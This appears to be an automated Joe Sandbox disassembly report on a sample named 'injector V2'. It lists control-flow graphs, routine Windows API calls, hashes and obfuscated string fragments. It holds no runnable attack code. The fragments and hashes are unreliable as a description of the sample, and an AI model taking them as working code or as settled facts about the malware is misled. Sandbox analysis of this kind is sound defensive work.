                                                                                    control_flow_graph 25 b50e88-b50ea1 26 b50eb7-b50ebc 25->26 27 b50ea3-b50eb3 call b53990 25->27 28 b50ebe-b50ec6 26->28 29 b50ec9-b50eef call b4ed44 26->29 27->26 34 b50eb5 27->34 28->29 35 b51065-b51076 call b48dd1 29->35 36 b50ef5-b50f00 29->36 34->26 37 b50f06-b50f0b 36->37 38 b51058 36->38 40 b50f24-b50f2f call b4eb9b 37->40 41 b50f0d-b50f16 call b52b70 37->41 42 b5105a 38->42 40->42 52 b50f35 40->52 41->42 50 b50f1c-b50f22 41->50 45 b5105c-b51063 call b4ec23 42->45 45->35 53 b50f3b-b50f40 50->53 52->53 53->42 54 b50f46-b50f5b call b4ed44 53->54 54->42 57 b50f61-b50f73 call b4c7cc 54->57 59 b50f78-b50f7c 57->59 59->42 60 b50f82-b50f8a 59->60 61 b50fc4-b50fd0 60->61 62 b50f8c-b50f91 60->62 64 b50fd2-b50fd4 61->64 65 b5104d 61->65 62->45 63 b50f97-b50f99 62->63 63->42 67 b50f9f-b50fb9 call b4c7cc 63->67 68 b50fd6-b50fdf call b52b70 64->68 69 b50fe9-b50ff4 call b4eb9b 64->69 66 b5104f-b51056 call b4ec23 65->66 66->42 67->45 80 b50fbf 67->80 68->66 78 b50fe1-b50fe7 68->78 69->66 79 b50ff6 69->79 81 b50ffc-b51001 78->81 79->81 80->42 81->66 82 b51003-b5101b call b4c7cc 81->82 82->66 85 b5101d-b51024 82->85 86 b51045-b5104b 85->86 87 b51026-b51027 85->87 88 b51028-b5103a call b5010e 86->88 87->88 88->66 91 b5103c-b51043 call b4ec23 88->91 91->45
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B50F0D
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B50FD6
                                                                                    • __freea.LIBCMT ref: 00B5103D
                                                                                      • Part of subcall function 00B4EB9B: RtlAllocateHeap.NTDLL(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD
                                                                                    • __freea.LIBCMT ref: 00B51050
                                                                                    • __freea.LIBCMT ref: 00B5105D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1423051803-0
                                                                                    • Opcode ID: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
                                                                                    • Instruction ID: 1f6971281628d21f245d5bcfc780716d454275995275f21cbc0fd42626e7dee7
                                                                                    • Opcode Fuzzy Hash: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
                                                                                    • Instruction Fuzzy Hash: 3651E672600256AFDB206F68CC81FBB7BE9EF44712F1908E9FD04D6181EB74DD889660

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 94 b4d4ca-b4d4f2 call b4d6cf 97 b4d6b7-b4d6b8 call b4d740 94->97 98 b4d4f8-b4d4fe 94->98 101 b4d6bd-b4d6bf 97->101 100 b4d501-b4d507 98->100 102 b4d603-b4d622 call b4a520 100->102 103 b4d50d-b4d519 100->103 105 b4d6c0-b4d6ce call b48dd1 101->105 111 b4d625-b4d62a 102->111 103->100 106 b4d51b-b4d521 103->106 109 b4d527-b4d533 IsValidCodePage 106->109 110 b4d5fb-b4d5fe 106->110 109->110 113 b4d539-b4d540 109->113 110->105 114 b4d667-b4d671 111->114 115 b4d62c-b4d631 111->115 116 b4d562-b4d56f GetCPInfo 113->116 117 b4d542-b4d54e 113->117 114->111 122 b4d673-b4d69d call b4da1b 114->122 120 b4d664 115->120 121 b4d633-b4d63b 115->121 118 b4d571-b4d590 call b4a520 116->118 119 b4d5ef-b4d5f5 116->119 123 b4d552-b4d55d 117->123 118->123 134 b4d592-b4d599 118->134 119->97 119->110 120->114 125 b4d65c-b4d662 121->125 126 b4d63d-b4d640 121->126 136 b4d69e-b4d6ad 122->136 128 b4d6af-b4d6b0 call b4da59 123->128 125->115 125->120 131 b4d642-b4d648 126->131 133 b4d6b5 128->133 131->125 135 b4d64a-b4d65a 131->135 133->101 137 b4d5c5-b4d5c8 134->137 138 b4d59b-b4d5a0 134->138 135->125 135->131 136->128 136->136 140 b4d5cd-b4d5d4 137->140 138->137 139 b4d5a2-b4d5aa 138->139 141 b4d5ac-b4d5b3 139->141 142 b4d5bd-b4d5c3 139->142 140->140 143 b4d5d6-b4d5ea call b4da1b 140->143 144 b4d5b4-b4d5bb 141->144 142->137 142->138 143->123 144->142 144->144
                                                                                    APIs
                                                                                      • Part of subcall function 00B4D6CF: GetOEMCP.KERNEL32(00000000,?,?,788496A7,?), ref: 00B4D6FA
                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00B4D8DA,?,00000000,?,788496A7,?), ref: 00B4D52B
                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4D8DA,?,00000000,?,788496A7,?), ref: 00B4D567
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValid
                                                                                    • String ID:
                                                                                    • API String ID: 546120528-0
                                                                                    • Opcode ID: 4bc2093dba82f7c467ceb8236277272aa796ec41020f63852f32eae185aa96ba
                                                                                    • Instruction ID: f58ce3a83534f1be53be4940bb6bf28c01797575e83e4f8f98a6c27177aa8404
                                                                                    • Opcode Fuzzy Hash: 4bc2093dba82f7c467ceb8236277272aa796ec41020f63852f32eae185aa96ba
                                                                                    • Instruction Fuzzy Hash: 24513570A003459EDB21CF75C880BABBBF5EF65304F1945EED08A8B251EB749B46EB40

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 147 b4d2b2-b4d2b7 148 b4d2b9-b4d2d1 147->148 149 b4d2d3-b4d2d7 148->149 150 b4d2df-b4d2e8 148->150 149->150 151 b4d2d9-b4d2dd 149->151 152 b4d2fa 150->152 153 b4d2ea-b4d2ed 150->153 154 b4d354-b4d358 151->154 157 b4d2fc-b4d309 GetStdHandle 152->157 155 b4d2f6-b4d2f8 153->155 156 b4d2ef-b4d2f4 153->156 154->148 158 b4d35e-b4d361 154->158 155->157 156->157 159 b4d336-b4d348 157->159 160 b4d30b-b4d30d 157->160 159->154 162 b4d34a-b4d34d 159->162 160->159 161 b4d30f-b4d318 GetFileType 160->161 161->159 163 b4d31a-b4d323 161->163 162->154 164 b4d325-b4d329 163->164 165 b4d32b-b4d32e 163->165 164->154 165->154 166 b4d330-b4d334 165->166 166->154
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00B4D1A1,00B5CB48,0000000C), ref: 00B4D2FE
                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00B4D1A1,00B5CB48,0000000C), ref: 00B4D310
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • String ID:
                                                                                    • API String ID: 3000768030-0
                                                                                    • Opcode ID: 348975e5278339b0afb802a4f0d703527534fb4c52e9012de2bab40c34984b12
                                                                                    • Instruction ID: c2fe17e8a1e9ebccf0b8380b5a075c61446fb4b49722ae389d363cfa1e729848
                                                                                    • Opcode Fuzzy Hash: 348975e5278339b0afb802a4f0d703527534fb4c52e9012de2bab40c34984b12
                                                                                    • Instruction Fuzzy Hash: 1611BE715047514ACB348E3E8CD8622BAD5EB56331B380BDED0B6875F1C770DA8AF646

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 167 b2a0b0-b2a0ee 168 b2a0f0-b2a10b 167->168 169 b2a116-b2a11c 167->169 170 b2a10e-b2a114 168->170 171 b2a11e-b2a124 169->171 172 b2a14c-b2a16c ExitProcess 169->172 170->168 170->169 171->170 173 b2a126-b2a146 ExitProcess 171->173
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: 3baeb97debc81cc788f9da60d455fd2c511d23deed4f9ef9d96aad1951c7d043
                                                                                    • Instruction ID: a015e8ef9b35ebceecddd01bffcb65f3caf2a5d29ab992890bdd4d97bc4b901a
                                                                                    • Opcode Fuzzy Hash: 3baeb97debc81cc788f9da60d455fd2c511d23deed4f9ef9d96aad1951c7d043
                                                                                    • Instruction Fuzzy Hash: 8E110D35B102146BE7544A388970B6F7BEBDBCE721F1540E9E949E73C4DE314C468791

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 176 b4c7cc-b4c7db call b4ca1e 179 b4c804-b4c81e call b4c829 LCMapStringW 176->179 180 b4c7dd-b4c802 LCMapStringEx 176->180 184 b4c824-b4c826 179->184 180->184
                                                                                    APIs
                                                                                    • LCMapStringEx.KERNELBASE(?,00B50F78,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00B4C800
                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00B50F78,?,?,-00000008,?,00000000), ref: 00B4C81E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID:
                                                                                    • API String ID: 2568140703-0
                                                                                    • Opcode ID: 1424453df14d096d47e3a42b3bd708086e3f1a05e4272a32ca7e2b8e85086147
                                                                                    • Instruction ID: 51f8adf1e4b87242fc4b9f0fe13096a84cb104d6cd0ec8de5078fb9a514c46ee
                                                                                    • Opcode Fuzzy Hash: 1424453df14d096d47e3a42b3bd708086e3f1a05e4272a32ca7e2b8e85086147
                                                                                    • Instruction Fuzzy Hash: 6AF07A3200121ABBCF125F90DC09EEE7FA6EF487A0F094060FA1826020DB36C931BB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 185 b4dc4b-b4dc54 186 b4dc56-b4dc69 RtlFreeHeap 185->186 187 b4dc83-b4dc84 185->187 186->187 188 b4dc6b-b4dc82 GetLastError call b4e465 call b4e41c 186->188 188->187
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,00B4BC8C,00B2782F), ref: 00B4DC61
                                                                                    • GetLastError.KERNEL32(?,?,00B4BC8C,00B2782F), ref: 00B4DC6C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 485612231-0
                                                                                    • Opcode ID: 968a351e61565c2030ad16061e0fb54d2c090737216ae0a41775b5e79da6a138
                                                                                    • Instruction ID: 189e6bed1e21980e7c59eb530d51daf056726a73d63c4995567e4e18d6aecb51
                                                                                    • Opcode Fuzzy Hash: 968a351e61565c2030ad16061e0fb54d2c090737216ae0a41775b5e79da6a138
                                                                                    • Instruction Fuzzy Hash: 26E04632200704ABCF122FA4FD09B997BA9EB40752F1040E0F61897161CB759A40D684

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 193 b4da59-b4da7b 194 b4da81-b4da93 GetCPInfo 193->194 195 b4db8d-b4dbb3 193->195 194->195 197 b4da99-b4daa0 194->197 196 b4dbb8-b4dbbd 195->196 198 b4dbc7-b4dbcd 196->198 199 b4dbbf-b4dbc5 196->199 200 b4daa2-b4daac 197->200 202 b4dbcf-b4dbd2 198->202 203 b4dbd9 198->203 201 b4dbd5-b4dbd7 199->201 200->200 204 b4daae-b4dac1 200->204 205 b4dbdb-b4dbed 201->205 202->201 203->205 206 b4dae2-b4dae4 204->206 205->196 209 b4dbef-b4dbfd call b48dd1 205->209 207 b4dae6-b4db1d call b4ec43 call b50e3f 206->207 208 b4dac3-b4daca 206->208 219 b4db22-b4db50 call b50e3f 207->219 212 b4dad9-b4dadb 208->212 215 b4dacc-b4dace 212->215 216 b4dadd-b4dae0 212->216 215->216 218 b4dad0-b4dad8 215->218 216->206 218->212 222 b4db52-b4db5d 219->222 223 b4db5f-b4db69 222->223 224 b4db6b-b4db6e 222->224 225 b4db7e-b4db89 223->225 226 b4db70-b4db7a 224->226 227 b4db7c 224->227 225->222 228 b4db8b 225->228 226->225 227->225 228->209
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(00000083,?,00000005,00B4D8DA,?), ref: 00B4DA8B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-0
                                                                                    • Opcode ID: 1d70e99ef17e7b6acbd3e48334776772f5fe46d4a16b16910d1484e4f81c882a
                                                                                    • Instruction ID: 10991c991ed4056e34409d23dab0f8d1acfd3436559c108a9ae922d237ec4204
                                                                                    • Opcode Fuzzy Hash: 1d70e99ef17e7b6acbd3e48334776772f5fe46d4a16b16910d1484e4f81c882a
                                                                                    • Instruction Fuzzy Hash: 185128B1908159AFDB118F28CDC4BE9BBE9EB16304F2401E9E599C7142D3359F85EB60

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 229 b2b0e4-b2b133 ReadFile 230 b2b139-b2b13e 229->230 231 b2cbcf-b2cbda 229->231 230->231 232 b2a1f0-b2a1f6 231->232 233 b2cbe0-b2cc2d 231->233 235 b2b7f0-b2b84a 232->235 236 b2a1fc-b2a252 232->236 233->235 237 b2cc33 233->237 235->232 253 b2b850-b2b87a 235->253 236->232 252 b2a254-b2a25f 236->252 237->236 252->235 254 b2a265 252->254 253->231 255 b2b880-b2b885 253->255 254->236 255->231
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B2B0FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: efb4cf24b17c03612b24d98395a0995f02a40541dbcfed7021397d12f966a26e
                                                                                    • Instruction ID: 7185865113b351fa2fe8be82bdd5e34ac5f6ae5b4e13f8fe9c31b6e934f39f01
                                                                                    • Opcode Fuzzy Hash: efb4cf24b17c03612b24d98395a0995f02a40541dbcfed7021397d12f966a26e
                                                                                    • Instruction Fuzzy Hash: 7311E5316083629FCE2C9A2878A553D67D3BBE6311F3845DEE40F877A4D9628D859603

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 256 b4eb9b-b4eba7 257 b4ebd9-b4ebe4 call b4e41c 256->257 258 b4eba9-b4ebab 256->258 265 b4ebe6-b4ebe8 257->265 260 b4ebc4-b4ebd5 RtlAllocateHeap 258->260 261 b4ebad-b4ebae 258->261 263 b4ebd7 260->263 264 b4ebb0-b4ebb7 call b4bc3e 260->264 261->260 263->265 264->257 268 b4ebb9-b4ebc2 call b4abd8 264->268 268->257 268->260
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 6364d5e1bc504ea384b2755560211144781a4d2e1a04fc0f90a94604b212e11f
                                                                                    • Instruction ID: 4ae4776048349417da8c99ab35688fe90d84389156f40f1b0892cb13b7374e71
                                                                                    • Opcode Fuzzy Hash: 6364d5e1bc504ea384b2755560211144781a4d2e1a04fc0f90a94604b212e11f
                                                                                    • Instruction Fuzzy Hash: C3E0ED31108226AADB2127659C85F6A7AC8FB427B0F1405E0FC23934C0CF60DF00B2E2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: KH%Y$KJn?$KJn?$KJn?$KJn?$LH%Y$LH%Y$LH%Y$LH%Y$h^'$i^'$i^'$i^'$i^'$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%${L%${L%${L%${L%$V?D$V?D$V?D$V?D$V?D
                                                                                    • API String ID: 0-3543999248
                                                                                    • Opcode ID: d11b94d8e1e7a0a0393fd39350534f6a4378a8fa3d8254e457c94f5e795b6003
                                                                                    • Instruction ID: 8bdea4494a394f3e1a0a3e3fd6f17a2f7ca2b29a6aa1a485e4262d229aeab537
                                                                                    • Opcode Fuzzy Hash: d11b94d8e1e7a0a0393fd39350534f6a4378a8fa3d8254e457c94f5e795b6003
                                                                                    • Instruction Fuzzy Hash: 83B2B17A2597006F4B38CA2895C8669B3D29FD8370B35DB86D426CF3F8DB359C468642
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ($($($sL$sL$2h`?$2h`?$2h`?$2h`?$Dt$Dt$Dt$Hyol$Hyol$Hyol$Hyol$J+z7$J+z7$W8|$X8|$X8|$Yrf1$Yrf1$Yrf1$fM@#$fM@#$fM@#$zN_$zN_$zN_$No$No$[u$[u$[u
                                                                                    • API String ID: 0-1459843020
                                                                                    • Opcode ID: 92a2c0ae541ae7a76d76d4ed9fd146e66925cdedd2c3dc7040bb913e0b9abe22
                                                                                    • Instruction ID: ec0496337afd8055a36ec6650dbb6f14a9081dcd28c16d60811853cc85b636ee
                                                                                    • Opcode Fuzzy Hash: 92a2c0ae541ae7a76d76d4ed9fd146e66925cdedd2c3dc7040bb913e0b9abe22
                                                                                    • Instruction Fuzzy Hash: E4E2C33B7097118B4A288A2CE9D466DB2D396D4325F7B86D3D9138B3F8DB748C858743
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: >g[$!]j$"]j$"]j$"]j$"]j$&qq!$&qq!$&qq!$&qq!$&$&$&$&$+I"w$,I"w$,I"w$,I"w$,I"w$fVp$fVp$/YS$/YS$/YS
                                                                                    • API String ID: 0-635301867
                                                                                    • Opcode ID: be2c373e983d898951ee65cf91a86cbb334b35deeecb617bebe2a6090589d081
